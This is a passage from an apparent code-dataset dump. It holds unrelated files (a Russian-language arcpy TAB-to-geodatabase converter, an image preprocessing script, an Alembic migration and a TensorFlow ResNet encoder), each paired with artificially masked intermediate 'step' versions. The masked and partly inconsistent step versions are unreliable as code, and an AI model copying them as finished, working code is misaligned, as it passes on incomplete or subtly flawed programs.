output_folders.pop(folder, None)\noutput_folders.pop('', None)\nmsg(\"\"\"\nСоздание баз данных...\"\"\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + '.mdb')\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name +\n '.mdb'))\n try:\n a.CreatePersonalGDB_management(join(output_folder,\n output_subfolders), mdb_name + '.mdb')\n msg(' ' + mdb_local_path)\n except a.ExecuteError:\n warning(' ' + mdb_local_path)\nmsg(\"\"\"\nКонвертация TAB в слои...\"\"\")\nlayer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n a.Exists(layer_from)\n if not a.Exists(layer_from):\n continue\n layer_to_name = layer_from_name.replace(' ', '_')\n if layer_to_name[0].isdigit():\n layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) +\n '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n 
a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(\n ' Ошибка. Копирование объектов/строк не сработало:'\n + str(e))\n",
"step-4": "import arcpy as a\nfrom arcpy import AddMessage as msg, AddWarning as warning, AddError as error\nfrom os import mkdir, walk\nfrom os.path import join, dirname, basename, splitext\nfrom glob import glob as get_files\nfrom shutil import copy\nfrom collections import OrderedDict\ninput_folder = a.GetParameterAsText(0)\noutput_folder = a.GetParameterAsText(1)\nenable_rewrite_databases = a.GetParameterAsText(2)\nenable_rewrite_tabs = a.GetParameterAsText(3)\ninput_folders_order = [root.replace(input_folder + '\\\\', '') for root, dirs,\n _ in walk(input_folder)]\noutput_folders_order = [root.replace(output_folder + '\\\\', '') for root,\n dirs, _ in walk(output_folder)]\ninput_folders_unordered_dict = {root.replace(input_folder + '\\\\', ''): dirs for\n root, dirs, _ in walk(input_folder)}\noutput_folders_unordered_dict = {root.replace(output_folder + '\\\\', ''):\n dirs for root, dirs, _ in walk(output_folder)}\ninput_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in\n input_folders_order)\noutput_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in\n output_folders_order)\nmsg(\"\"\"\nПроверка на наличие подпапок исходной папки в выходной:\"\"\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\nmsg(\"\"\"\nПроверка на наличие подпапок выходной папки в исходной:\"\"\")\nremove_list = []\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\nmsg(\"\"\"\nКопирование файлов в папки...\"\"\")\nremove_list = []\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n if not tab_files:\n remove_list.append(subfolders)\n if u'Импорт' in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n msg(' ' + subfolders)\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder,\n subfolders, '*.*'))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID',\n '.IND', '.MAP']:\n msg(' ' + file_to_copy)\n copy(file_to_copy, similar_output_folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\noutput_folders.pop('', None)\nmsg(\"\"\"\nСоздание баз данных...\"\"\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + '.mdb')\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name +\n '.mdb'))\n try:\n a.CreatePersonalGDB_management(join(output_folder,\n output_subfolders), mdb_name + '.mdb')\n msg(' ' + mdb_local_path)\n except a.ExecuteError:\n warning(' ' + mdb_local_path)\nmsg(\"\"\"\nКонвертация TAB в слои...\"\"\")\nlayer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n a.Exists(layer_from)\n if not a.Exists(layer_from):\n continue\n layer_to_name = layer_from_name.replace(' ', '_')\n if layer_to_name[0].isdigit():\n 
layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) +\n '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(\n ' Ошибка. Копирование объектов/строк не сработало:'\n + str(e))\n",
"step-5": "# -*- coding: cp1251 -*-\nimport arcpy as a\nfrom arcpy import AddMessage as msg, AddWarning as warning, AddError as error\n\nfrom os import mkdir, walk\nfrom os.path import join, dirname, basename, splitext\nfrom glob import glob as get_files\nfrom shutil import copy\nfrom collections import OrderedDict\n\ninput_folder = a.GetParameterAsText(0)\noutput_folder = a.GetParameterAsText(1)\nenable_rewrite_databases = a.GetParameterAsText(2)\nenable_rewrite_tabs = a.GetParameterAsText(3)\n\n\n\ninput_folders_order = [root.replace(input_folder + '\\\\', '') for root, dirs, _ in walk(input_folder)]\noutput_folders_order = [root.replace(output_folder + '\\\\', '') for root, dirs, _ in walk(output_folder)]\n\ninput_folders_unordered_dict = {root.replace(input_folder + '\\\\', ''):dirs for root, dirs, _ in walk(input_folder)}\noutput_folders_unordered_dict = {root.replace(output_folder + '\\\\', ''):dirs for root, dirs, _ in walk(output_folder)}\n\ninput_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in input_folders_order)\noutput_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in output_folders_order)\n\nmsg(\"\\nПроверка на наличие подпапок исходной папки в выходной:\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\n\nmsg(\"\\nПроверка на наличие подпапок выходной папки в исходной:\")\nremove_list = []\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\n\nfor folder in remove_list:\n output_folders.pop(folder, None)\n\n\n\nmsg(\"\\nКопирование файлов в папки...\")\nremove_list = []\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, \"*.TAB\"))]\n if not tab_files:\n remove_list.append(subfolders)\n\n if u\"Импорт\" in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n\n msg(' ' + subfolders)\n\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder, subfolders, \"*.*\"))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID', '.IND', '.MAP']:\n msg(' ' + file_to_copy)\n copy(file_to_copy, similar_output_folder)\n\nfor folder in remove_list:\n output_folders.pop(folder, None)\n\noutput_folders.pop('', None)\n\n\n\nmsg(\"\\nСоздание баз данных...\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + \".mdb\")\n\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name + \".mdb\"))\n\n try:\n a.CreatePersonalGDB_management(join(output_folder, output_subfolders), mdb_name + \".mdb\")\n msg(\" \" + mdb_local_path)\n except a.ExecuteError:\n warning(\" \" + mdb_local_path)\n\n\n\nmsg(\"\\nКонвертация TAB в слои...\")\nlayer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']\n\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, \"*.TAB\"))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n\n a.Exists(layer_from)\n\n if not a.Exists(layer_from):\n continue\n\n layer_to_name = layer_from_name.replace(' ', 
'_')\n if layer_to_name[0].isdigit():\n layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) + '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(' Ошибка. Копирование объектов/строк не сработало:' + str(e))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import numpy as np
import torch
from timm.data.transforms_factory import transforms_imagenet_eval
from torchvision import transforms
from PIL import Image
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(
img_size,
interpolation=args.interpolation,
use_prefetcher=args.use_prefetcher,
mean=args.mean,
std=args.std,
crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, "===", i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
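        # the prefetcher-style timm transform skips normalisation, so the ImageNet mean/std are applied here on the 0-255 scale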
img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(
[x * 255 for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + ".bin"))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',
help='Image resize interpolation type (overrides model)')
    parser.add_argument('--use_prefetcher', action='store_true', default=True,
                        help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float,
metavar='N', help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = (0.485, 0.456, 0.406)
args.std = (0.229, 0.224, 0.225)
args.input_size = (3, 224, 224)
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "443ed24ab396e83dbf12558207376258124bca8b",
"index": 4094,
"step-1": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import argparse\nimport os\nimport numpy as np\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport os\nimport numpy as np\n\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n\n preprocesser = transforms_imagenet_eval(\n img_size,\n interpolation=args.interpolation,\n use_prefetcher=args.use_prefetcher,\n mean=args.mean,\n std=args.std,\n crop_pct=args.crop_pct)\n\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, \"===\", i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(\n [x * 255 for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + \".bin\"))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',\n help='Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float,\n metavar='N', help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = (0.485, 0.456, 0.406)\n args.std = (0.229, 0.224, 0.225)\n args.input_size = (3, 224, 224)\n\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
"""empty message
Revision ID: 42cf7f6532dd
Revises: e6d4ac8564fb
Create Date: 2019-04-01 16:13:37.207305
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '42cf7f6532dd'
down_revision = 'e6d4ac8564fb'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('stakeholder', sa.Column('archived', sa.Boolean(), nullable=False, default=False, server_default="false"))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('stakeholder', 'archived')
# ### end Alembic commands ###
|
normal
|
{
"blob_id": "42d9f40dd50056b1c258508a6cb3f9875680276a",
"index": 3393,
"step-1": "<mask token>\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(),\n nullable=False, default=False, server_default='false'))\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-3": "<mask token>\nrevision = '42cf7f6532dd'\ndown_revision = 'e6d4ac8564fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(),\n nullable=False, default=False, server_default='false'))\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-4": "<mask token>\nfrom alembic import op\nimport sqlalchemy as sa\nrevision = '42cf7f6532dd'\ndown_revision = 'e6d4ac8564fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(),\n nullable=False, default=False, server_default='false'))\n\n\ndef downgrade():\n op.drop_column('stakeholder', 'archived')\n",
"step-5": "\"\"\"empty message\n\nRevision ID: 42cf7f6532dd\nRevises: e6d4ac8564fb\nCreate Date: 2019-04-01 16:13:37.207305\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '42cf7f6532dd'\ndown_revision = 'e6d4ac8564fb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('stakeholder', sa.Column('archived', sa.Boolean(), nullable=False, default=False, server_default=\"false\"))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('stakeholder', 'archived')\n # ### end Alembic commands ###\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from __future__ import absolute_import, print_function, division, unicode_literals
import tensorflow as tf
def get_encoder(conf):
if conf.encoder == 'linear':
model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2),
tf.keras.layers.ReLU(),
tf.keras.layers.Dense(conf.d_model)])
return model
if conf.encoder == 'rand_linear':
model = get_stochastic_linear(conf)
return model
if conf.encoder[:5] == 'cifar':
model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k=conf.k, linear=conf.linear)
return model
def get_stochastic_linear(conf):
model = tf.keras.Sequential([tf.keras.layers.GaussianNoise(.3),
tf.keras.layers.Dense(conf.d_model * 2),
tf.keras.layers.ReLU(),
tf.keras.layers.GaussianNoise(.3),
tf.keras.layers.Dense(conf.d_model)])
return model
# noinspection PyAbstractClass
class BasicBlock(tf.keras.layers.Layer):
EXPANSION = 1
def __init__(self, channels, filters, strides=1):
super().__init__()
self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=strides, padding='same',
use_bias=False)
self.bn_1 = tf.keras.layers.BatchNormalization()
self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3, strides=1, padding='same',
use_bias=False)
self.bn_2 = tf.keras.layers.BatchNormalization()
self.shortcut = tf.keras.Sequential()
if strides != 1 or channels != (filters * self.EXPANSION):
self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION * filters, kernel_size=1, strides=strides,
use_bias=False))
self.shortcut.add(tf.keras.layers.BatchNormalization())
def call(self, inputs, training=True, mask=None):
x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))
x = self.bn_2(self.conv_2(x, training=training), training=training)
x += self.shortcut(inputs, training=training)
return tf.nn.relu(x)
# noinspection PyAbstractClass
class ResNet(tf.keras.Model):
def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1, k=10, linear=True):
super().__init__()
self.channels = 64
self.pool_len = pool_len
self.k = k
self.linear = linear
self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same', use_bias=False)
self.bn_1 = tf.keras.layers.BatchNormalization()
self.base = int(64 * width)
self.residual = tf.keras.Sequential([
self._make_layer(block, self.base, num_blocks[0], stride=1),
self._make_layer(block, self.base * 2, num_blocks[1], stride=2),
self._make_layer(block, self.base * 4, num_blocks[2], stride=2),
self._make_layer(block, self.base * 8, num_blocks[3], stride=2)
])
if self.linear:
self.fc = tf.keras.layers.Dense(low_dim)
self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len, data_format='channels_last')
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1] * (num_blocks - 1)
layers = []
for stride in strides:
layers.append(block(self.channels, planes, stride))
self.channels = planes * block.EXPANSION
return tf.keras.Sequential(layers)
def call(self, inputs, training=True, mask=None):
x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training), training=training))
x = self.residual(x, training=training)
x = self.pool(x)
batch_size = tf.shape(x)[0]
x = tf.reshape(x, [batch_size, -1])
if self.linear:
x = self.fc(x, training=training)
return x
def test_resnet():
model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1)
a = tf.ones([7, 32, 32, 3])
b = model(a)
print(b)
if __name__ == '__main__':
test_resnet()
|
normal
|
{
"blob_id": "548eebb9628374df320021c714454e05d2c606c0",
"index": 5336,
"step-1": "<mask token>\n\n\ndef get_encoder(conf):\n if conf.encoder == 'linear':\n model = tf.keras.Sequential([tf.keras.layers.Dense(conf.d_model * 2\n ), tf.keras.layers.ReLU(), tf.keras.layers.Dense(conf.d_model)])\n return model\n if conf.encoder == 'rand_linear':\n model = get_stochastic_linear(conf)\n return model\n if conf.encoder[:5] == 'cifar':\n model = ResNet(BasicBlock, [3, 4, 6, 3], 4, low_dim=128, width=1, k\n =conf.k, linear=conf.linear)\n return model\n\n\n<mask token>\n\n\nclass BasicBlock(tf.keras.layers.Layer):\n EXPANSION = 1\n\n def __init__(self, channels, filters, strides=1):\n super().__init__()\n self.conv_1 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=strides, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.conv_2 = tf.keras.layers.Conv2D(filters=filters, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_2 = tf.keras.layers.BatchNormalization()\n self.shortcut = tf.keras.Sequential()\n if strides != 1 or channels != filters * self.EXPANSION:\n self.shortcut.add(tf.keras.layers.Conv2D(filters=self.EXPANSION *\n filters, kernel_size=1, strides=strides, use_bias=False))\n self.shortcut.add(tf.keras.layers.BatchNormalization())\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.bn_2(self.conv_2(x, training=training), training=training)\n x += self.shortcut(inputs, training=training)\n return tf.nn.relu(x)\n\n\nclass ResNet(tf.keras.Model):\n\n def __init__(self, block, num_blocks, pool_len=4, low_dim=128, width=1,\n k=10, linear=True):\n super().__init__()\n self.channels = 64\n self.pool_len = pool_len\n self.k = k\n self.linear = linear\n self.conv_1 = tf.keras.layers.Conv2D(filters=64, kernel_size=3,\n strides=1, padding='same', use_bias=False)\n self.bn_1 = tf.keras.layers.BatchNormalization()\n self.base = int(64 * width)\n self.residual = tf.keras.Sequential([self._make_layer(block, self.\n base, num_blocks[0], stride=1), self._make_layer(block, self.\n base * 2, num_blocks[1], stride=2), self._make_layer(block, \n self.base * 4, num_blocks[2], stride=2), self._make_layer(block,\n self.base * 8, num_blocks[3], stride=2)])\n if self.linear:\n self.fc = tf.keras.layers.Dense(low_dim)\n self.pool = tf.keras.layers.AveragePooling2D(pool_len, pool_len,\n data_format='channels_last')\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1] * (num_blocks - 1)\n layers = []\n for stride in strides:\n layers.append(block(self.channels, planes, stride))\n self.channels = planes * block.EXPANSION\n return tf.keras.Sequential(layers)\n\n def call(self, inputs, training=True, mask=None):\n x = tf.nn.relu(self.bn_1(self.conv_1(inputs, training=training),\n training=training))\n x = self.residual(x, training=training)\n x = self.pool(x)\n batch_size = tf.shape(x)[0]\n x = tf.reshape(x, [batch_size, -1])\n if self.linear:\n x = self.fc(x, training=training)\n return x\n\n\n<mask token>\n",
